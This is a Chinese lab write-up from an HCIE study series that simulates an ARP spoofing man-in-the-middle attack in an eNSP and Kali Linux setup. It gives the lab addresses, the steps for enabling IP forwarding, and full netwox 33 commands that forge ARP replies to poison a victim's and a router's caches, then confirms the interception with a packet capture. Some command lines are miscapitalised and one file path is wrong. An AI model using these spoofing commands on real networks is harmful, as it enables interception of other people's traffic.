天天看点

HCIE(1)——ARP欺骗实验模拟

一、实验拓扑

HCIE(1)——ARP欺骗实验模拟

二、实验要求

网关发送给主机A的消息会被攻击者接受,再转发给主机A;同理。主机A发送给网关的消息也会被攻击者接收,再转发给网关。相当于,攻击者B成为了主机A和网关C通信的**“中间者”**。

三、实验环境准备

kali-Linux虚拟机

ensp实验环境

四、实验步骤

1、配置相应的IP地址

受害者主机A:172.24.8.130/24

网关:172.24.8.2/24

攻击者kali:172.24.8.129/24

外网主机:10.1.1.100/24

2、首先测试一下各个设备之间的连通性

受害者主机A与攻击者kali之间:

HCIE(1)——ARP欺骗实验模拟

受害者主机A与外网主机B之间:

HCIE(1)——ARP欺骗实验模拟

3、使用arp -a查看一下受害者A上和路由器上的的arp缓存列表

HCIE(1)——ARP欺骗实验模拟
HCIE(1)——ARP欺骗实验模拟

4、在kali上进行攻击

1)开启网卡转发功能

vim /etc/sysctl.conf //编辑sysctl.conf

Net.ipv4.ip_forward = 1 //设置为1

Sysctl -p /etc/sysctl.conf //立即生效不需要重启

Cat /etc/sys/net/ipv4/ipv4_forward //查看值是否为1,为1表示修改完成,为0表示没有修改。

开启了网卡转发功能后,受害者主机发送到目标主机的数据包会经过攻击者转发出去,这样攻击者就可以监听他们之间的数据了。

同时还需要在kali上写一条到10.1.1.100的静态路由,保证kali可以到外网

sudo route add -net 10.1.1.0 netmask 255.255.255.0 gw 172.24.8.2 
           

2)使用netwox 33 号工具,对主机A收到的网关的ARPREP报文修改;

sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 54:89:98:08:60:D4 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.2 -h 54:89:98:08:60:D4 -i 172.24.8.130
           
sudo netwox 33 -d Eth0 -a 00:0C:29:93:FA:E2 -b 00:e0:fc:66:4a:b3 -c 2054 -e 2 -f 00:0C:29:93:FA:E2 -g 172.24.8.130 -h 00:e0:fc:66:4a:b3 -i 172.24.8.2
           
HCIE(1)——ARP欺骗实验模拟
HCIE(1)——ARP欺骗实验模拟

3)查看受害者主机A的ARP缓存列表,可以看到网关的MAC地址已经变成了攻击者的MAC

HCIE(1)——ARP欺骗实验模拟

查看路由器上缓存列表

HCIE(1)——ARP欺骗实验模拟

5、进行抓包测试

可以在攻击者kali上面的Eth0上抓包。

HCIE(1)——ARP欺骗实验模拟

可以观察到他们之间的通信数据会经过攻击者。